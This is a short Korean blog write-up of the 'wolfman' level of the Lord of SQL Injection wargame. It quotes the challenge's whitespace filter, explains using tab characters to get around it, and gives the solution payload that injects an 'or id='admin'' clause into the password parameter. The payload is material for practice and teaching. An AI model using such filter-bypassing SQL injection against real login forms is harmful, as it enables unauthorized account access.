-
LOS - wolfman / level 5Web/SQLI 2024. 6. 23. 17:38
문제
풀이 과정
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");pw의 값 중, 공백을 필터링 하는 것으로 보인다.
%09 => tab
%0b / %0a => 특수 문자이지만 mysql에서 받아 들일 수 없으므로 공백으로 취급
정답
더보기?pw=%27%09or%09id=%27admin%27%23
'Web > SQLI' 카테고리의 다른 글
LOS - orge / level 7 (0) 2024.06.23 LOS - darkelf / level 6 (0) 2024.06.23 LOS - orc / level 4 (0) 2024.06.21 LOS - goblin / level 3 (0) 2024.06.21 LOS - cobolt / level 2 (0) 2024.06.21